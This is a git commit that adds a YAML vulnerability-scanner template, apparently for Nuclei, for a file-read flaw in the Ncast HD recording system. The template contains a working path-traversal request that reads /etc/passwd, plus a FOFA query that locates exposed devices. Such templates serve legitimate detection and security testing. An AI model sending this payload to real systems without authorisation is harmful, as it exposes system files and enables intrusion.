Create ncast-lfi.yaml

main
pussycat0x 2024-07-18 00:34:21 +05:30 committed by GitHub
parent 51194f2d14
commit be7d690b13
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: ncast-lfi
info:
name: Ncast HD Intelligent - LFI
author: pussycat0x
severity: high
description: |
Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability.
reference:
- https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
tags: ncast,lfi,misconfig
http:
- method: GET
path:
- "{{BaseURL}}/developLog/downloadLog.php?name=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200